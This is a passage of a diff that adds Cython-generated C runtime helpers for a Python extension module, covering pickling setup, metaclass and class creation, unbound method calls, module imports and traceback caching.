__pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* Py3UpdateBases */ +static PyObject* +__Pyx_PEP560_update_bases(PyObject *bases) +{ + Py_ssize_t i, j, size_bases; + PyObject *base, *meth, *new_base, *result, *new_bases = NULL; + size_bases = PyTuple_GET_SIZE(bases); + for (i = 0; i < size_bases; i++) { + base = PyTuple_GET_ITEM(bases, i); + if (PyType_Check(base)) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + meth = __Pyx_PyObject_GetAttrStrNoError(base, __pyx_n_s_mro_entries); + if (!meth && PyErr_Occurred()) { + goto error; + } + if (!meth) { + if (new_bases) { + if (PyList_Append(new_bases, base) < 0) { + goto error; + } + } + continue; + } + new_base = __Pyx_PyObject_CallOneArg(meth, bases); + Py_DECREF(meth); + if (!new_base) { + goto error; + } + if (!PyTuple_Check(new_base)) { + PyErr_SetString(PyExc_TypeError, + "__mro_entries__ must return a tuple"); + Py_DECREF(new_base); + goto error; + } + if (!new_bases) { + if (!(new_bases = PyList_New(i))) { + goto error; + } + for (j = 0; j < i; j++) { + base = PyTuple_GET_ITEM(bases, j); + PyList_SET_ITEM(new_bases, j, base); + Py_INCREF(base); + } + } + j = PyList_GET_SIZE(new_bases); + if (PyList_SetSlice(new_bases, j, j, new_base) < 0) { + goto error; + } + Py_DECREF(new_base); + } + if (!new_bases) { + Py_INCREF(bases); + return bases; + } + result = PyList_AsTuple(new_bases); + Py_DECREF(new_bases); + return result; +error: + Py_XDECREF(new_bases); + return NULL; +} + +/* SetNewInClass */ +static int __Pyx_SetNewInClass(PyObject *ns, PyObject *name, PyObject *value) { +#ifdef __Pyx_CyFunction_USED + int ret; + if (__Pyx_CyFunction_Check(value)) { + PyObject *staticnew = PyStaticMethod_New(value); + if (unlikely(!staticnew)) return -1; + ret = __Pyx_SetNameInClass(ns, name, staticnew); + Py_DECREF(staticnew); + return ret; + } +#endif + return __Pyx_SetNameInClass(ns, name, value); +} + +/* CalculateMetaclass */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases) { + Py_ssize_t i, nbases = PyTuple_GET_SIZE(bases); + for (i=0; i < nbases; i++) { + PyTypeObject *tmptype; + PyObject *tmp = PyTuple_GET_ITEM(bases, i); + tmptype = Py_TYPE(tmp); +#if PY_MAJOR_VERSION < 3 + if (tmptype == &PyClass_Type) + continue; +#endif + if (!metaclass) { + metaclass = tmptype; + continue; + } + if (PyType_IsSubtype(metaclass, tmptype)) + continue; + if (PyType_IsSubtype(tmptype, metaclass)) { + metaclass = tmptype; + continue; + } + PyErr_SetString(PyExc_TypeError, + "metaclass conflict: " + "the metaclass of a derived class " + "must be a (non-strict) subclass " + "of the metaclasses of all its bases"); + return NULL; + } + if (!metaclass) { +#if PY_MAJOR_VERSION < 3 + metaclass = &PyClass_Type; +#else + metaclass = &PyType_Type; +#endif + } + Py_INCREF((PyObject*) metaclass); + return (PyObject*) metaclass; +} + +/* PyObjectCall2Args */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { + PyObject *args[3] = {NULL, arg1, arg2}; + return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectLookupSpecial */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error) { + PyObject *res; + PyTypeObject *tp = Py_TYPE(obj); +#if PY_MAJOR_VERSION < 3 + if (unlikely(PyInstance_Check(obj))) + return with_error ? __Pyx_PyObject_GetAttrStr(obj, attr_name) : __Pyx_PyObject_GetAttrStrNoError(obj, attr_name); +#endif + res = _PyType_Lookup(tp, attr_name); + if (likely(res)) { + descrgetfunc f = Py_TYPE(res)->tp_descr_get; + if (!f) { + Py_INCREF(res); + } else { + res = f(res, obj, (PyObject *)tp); + } + } else if (with_error) { + PyErr_SetObject(PyExc_AttributeError, attr_name); + } + return res; +} +#endif + +/* Py3ClassCreate */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, + PyObject *qualname, PyObject *mkw, PyObject *modname, PyObject *doc) { + PyObject *ns; + if (metaclass) { + PyObject *prep = __Pyx_PyObject_GetAttrStrNoError(metaclass, __pyx_n_s_prepare); + if (prep) { + PyObject *pargs[3] = {NULL, name, bases}; + ns = __Pyx_PyObject_FastCallDict(prep, pargs+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, mkw); + Py_DECREF(prep); + } else { + if (unlikely(PyErr_Occurred())) + return NULL; + ns = PyDict_New(); + } + } else { + ns = PyDict_New(); + } + if (unlikely(!ns)) + return NULL; + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_module, modname) < 0)) goto bad; +#if PY_VERSION_HEX >= 0x03030000 + if (unlikely(PyObject_SetItem(ns, __pyx_n_s_qualname, qualname) < 0)) goto bad; +#else + CYTHON_MAYBE_UNUSED_VAR(qualname); +#endif + if (unlikely(doc && PyObject_SetItem(ns, __pyx_n_s_doc, doc) < 0)) goto bad; + return ns; +bad: + Py_DECREF(ns); + return NULL; +} +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS +static int __Pyx_SetNamesPEP487(PyObject *type_obj) { + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *names_to_set, *key, *value, *set_name, *tmp; + Py_ssize_t i = 0; +#if CYTHON_USE_TYPE_SLOTS + names_to_set = PyDict_Copy(type->tp_dict); +#else + { + PyObject *d = PyObject_GetAttr(type_obj, __pyx_n_s_dict); + names_to_set = NULL; + if (likely(d)) { + PyObject *names_to_set = PyDict_New(); + int ret = likely(names_to_set) ? PyDict_Update(names_to_set, d) : -1; + Py_DECREF(d); + if (unlikely(ret < 0)) + Py_CLEAR(names_to_set); + } + } +#endif + if (unlikely(names_to_set == NULL)) + goto bad; + while (PyDict_Next(names_to_set, &i, &key, &value)) { + set_name = __Pyx_PyObject_LookupSpecialNoError(value, __pyx_n_s_set_name); + if (unlikely(set_name != NULL)) { + tmp = __Pyx_PyObject_Call2Args(set_name, type_obj, key); + Py_DECREF(set_name); + if (unlikely(tmp == NULL)) { + __Pyx_TypeName value_type_name = + __Pyx_PyType_GetName(Py_TYPE(value)); + __Pyx_TypeName type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_RuntimeError, +#if PY_MAJOR_VERSION >= 3 + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %R " "in '" __Pyx_FMT_TYPENAME "'", + value_type_name, key, type_name); +#else + "Error calling __set_name__ on '" __Pyx_FMT_TYPENAME "' instance %.100s in '" __Pyx_FMT_TYPENAME "'", + value_type_name, + PyString_Check(key) ? PyString_AS_STRING(key) : "?", + type_name); +#endif + goto bad; + } else { + Py_DECREF(tmp); + } + } + else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } + Py_DECREF(names_to_set); + return 0; +bad: + Py_XDECREF(names_to_set); + return -1; +} +static PyObject *__Pyx_InitSubclassPEP487(PyObject *type_obj, PyObject *mkw) { +#if CYTHON_USE_TYPE_SLOTS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyTypeObject *type = (PyTypeObject*) type_obj; + PyObject *mro = type->tp_mro; + Py_ssize_t i, nbases; + if (unlikely(!mro)) goto done; + (void) &__Pyx_GetBuiltinName; + Py_INCREF(mro); + nbases = PyTuple_GET_SIZE(mro); + assert(PyTuple_GET_ITEM(mro, 0) == type_obj); + for (i = 1; i < nbases-1; i++) { + PyObject *base, *dict, *meth; + base = PyTuple_GET_ITEM(mro, i); + dict = ((PyTypeObject *)base)->tp_dict; + meth = __Pyx_PyDict_GetItemStrWithError(dict, __pyx_n_s_init_subclass); + if (unlikely(meth)) { + descrgetfunc f = Py_TYPE(meth)->tp_descr_get; + PyObject *res; + Py_INCREF(meth); + if (likely(f)) { + res = f(meth, NULL, type_obj); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + meth = res; + } + res = __Pyx_PyObject_FastCallDict(meth, NULL, 0, mkw); + Py_DECREF(meth); + if (unlikely(!res)) goto bad; + Py_DECREF(res); + goto done; + } else if (unlikely(PyErr_Occurred())) { + goto bad; + } + } +done: + Py_XDECREF(mro); + return type_obj; +bad: + Py_XDECREF(mro); + Py_DECREF(type_obj); + return NULL; +#else + PyObject *super_type, *super, *func, *res; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + super_type = __Pyx_GetBuiltinName(__pyx_n_s_super); +#else + super_type = (PyObject*) &PySuper_Type; + (void) &__Pyx_GetBuiltinName; +#endif + super = likely(super_type) ? __Pyx_PyObject_Call2Args(super_type, type_obj, type_obj) : NULL; +#if CYTHON_COMPILING_IN_PYPY && !defined(PySuper_Type) + Py_XDECREF(super_type); +#endif + if (unlikely(!super)) { + Py_CLEAR(type_obj); + goto done; + } + func = __Pyx_PyObject_GetAttrStrNoError(super, __pyx_n_s_init_subclass); + Py_DECREF(super); + if (likely(!func)) { + if (unlikely(PyErr_Occurred())) + Py_CLEAR(type_obj); + goto done; + } + res = __Pyx_PyObject_FastCallDict(func, NULL, 0, mkw); + Py_DECREF(func); + if (unlikely(!res)) + Py_CLEAR(type_obj); + Py_XDECREF(res); +done: + return type_obj; +#endif +} +#endif +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, + PyObject *dict, PyObject *mkw, + int calculate_metaclass, int allow_py2_metaclass) { + PyObject *result; + PyObject *owned_metaclass = NULL; + PyObject *margs[4] = {NULL, name, bases, dict}; + if (allow_py2_metaclass) { + owned_metaclass = PyObject_GetItem(dict, __pyx_n_s_metaclass); + if (owned_metaclass) { + metaclass = owned_metaclass; + } else if (likely(PyErr_ExceptionMatches(PyExc_KeyError))) { + PyErr_Clear(); + } else { + return NULL; + } + } + if (calculate_metaclass && (!metaclass || PyType_Check(metaclass))) { + metaclass = __Pyx_CalculateMetaclass((PyTypeObject*) metaclass, bases); + Py_XDECREF(owned_metaclass); + if (unlikely(!metaclass)) + return NULL; + owned_metaclass = metaclass; + } + result = __Pyx_PyObject_FastCallDict(metaclass, margs+1, 3 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET, +#if PY_VERSION_HEX < 0x030600A4 + (metaclass == (PyObject*)&PyType_Type) ? NULL : mkw +#else + mkw +#endif + ); + Py_XDECREF(owned_metaclass); +#if PY_VERSION_HEX < 0x030600A4 && CYTHON_PEP487_INIT_SUBCLASS + if (likely(result) && likely(PyType_Check(result))) { + if (unlikely(__Pyx_SetNamesPEP487(result) < 0)) { + Py_CLEAR(result); + } else { + result = __Pyx_InitSubclassPEP487(result, mkw); + } + } +#else + (void) &__Pyx_GetBuiltinName; +#endif + return result; +} + +/* Globals */ +static PyObject* __Pyx_Globals(void) { + return __Pyx_NewRef(__pyx_d); +} + +/* UnpackUnboundCMethod */ +static PyObject *__Pyx_SelflessCall(PyObject *method, PyObject *args, PyObject *kwargs) { + PyObject *selfless_args = PyTuple_GetSlice(args, 1, PyTuple_Size(args)); + if (unlikely(!selfless_args)) return NULL; + PyObject *result = PyObject_Call(method, selfless_args, kwargs); + Py_DECREF(selfless_args); + return result; +} +static PyMethodDef __Pyx_UnboundCMethod_Def = { + "CythonUnboundCMethod", + __PYX_REINTERPRET_FUNCION(PyCFunction, __Pyx_SelflessCall), + METH_VARARGS | METH_KEYWORDS, + NULL +}; +static int __Pyx_TryUnpackUnboundCMethod(__Pyx_CachedCFunction* target) { + PyObject *method; + method = __Pyx_PyObject_GetAttrStr(target->type, *target->method_name); + if (unlikely(!method)) + return -1; + target->method = method; +#if CYTHON_COMPILING_IN_CPYTHON + #if PY_MAJOR_VERSION >= 3 + if (likely(__Pyx_TypeCheck(method, &PyMethodDescr_Type))) + #else + if (likely(!PyCFunction_Check(method))) + #endif + { + PyMethodDescrObject *descr = (PyMethodDescrObject*) method; + target->func = descr->d_method->ml_meth; + target->flag = descr->d_method->ml_flags & ~(METH_CLASS | METH_STATIC | METH_COEXIST | METH_STACKLESS); + } else +#endif +#if defined(CYTHON_COMPILING_IN_PYPY) +#elif PY_VERSION_HEX >= 0x03090000 + if (PyCFunction_CheckExact(method)) +#else + if (PyCFunction_Check(method)) +#endif + { + PyObject *self; + int self_found; +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + self = PyObject_GetAttrString(method, "__self__"); + if (!self) { + PyErr_Clear(); + } +#else + self = PyCFunction_GET_SELF(method); +#endif + self_found = (self && self != Py_None); +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + Py_XDECREF(self); +#endif + if (self_found) { + PyObject *unbound_method = PyCFunction_New(&__Pyx_UnboundCMethod_Def, method); + if (unlikely(!unbound_method)) return -1; + Py_DECREF(method); + target->method = unbound_method; + } + } + return 0; +} + +/* CallUnboundCMethod1 */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg) { + if (likely(cfunc->func)) { + int flag = cfunc->flag; + if (flag == METH_O) { + return (*(cfunc->func))(self, arg); + } else if ((PY_VERSION_HEX >= 0x030600B1) && flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, &arg, 1); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + #endif + } else if ((PY_VERSION_HEX >= 0x030700A0) && flag == (METH_FASTCALL | METH_KEYWORDS)) { + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + } + } + return __Pyx__CallUnboundCMethod1(cfunc, self, arg); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(1); + if (unlikely(!args)) goto bad; + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 0, arg); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 1, arg); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(2, self, arg); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* CallUnboundCMethod2 */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2) { + if (likely(cfunc->func)) { + PyObject *args[2] = {arg1, arg2}; + if (cfunc->flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, args, 2); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + #if PY_VERSION_HEX >= 0x030700A0 + if (cfunc->flag == (METH_FASTCALL | METH_KEYWORDS)) + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + return __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 0, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 1, arg2); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(3); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 1, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 2, arg2); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(3, self, arg1, arg2); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* dict_getitem_default */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value) { + PyObject* value; +#if PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) + value = PyDict_GetItemWithError(d, key); + if (unlikely(!value)) { + if (unlikely(PyErr_Occurred())) + return NULL; + value = default_value; + } + Py_INCREF(value); + if ((1)); +#else + if (PyString_CheckExact(key) || PyUnicode_CheckExact(key) || PyInt_CheckExact(key)) { + value = PyDict_GetItem(d, key); + if (unlikely(!value)) { + value = default_value; + } + Py_INCREF(value); + } +#endif + else { + if (default_value == Py_None) + value = __Pyx_CallUnboundCMethod1(&__pyx_umethod_PyDict_Type_get, d, key); + else + value = __Pyx_CallUnboundCMethod2(&__pyx_umethod_PyDict_Type_get, d, key, default_value); + } + return value; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__21; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", 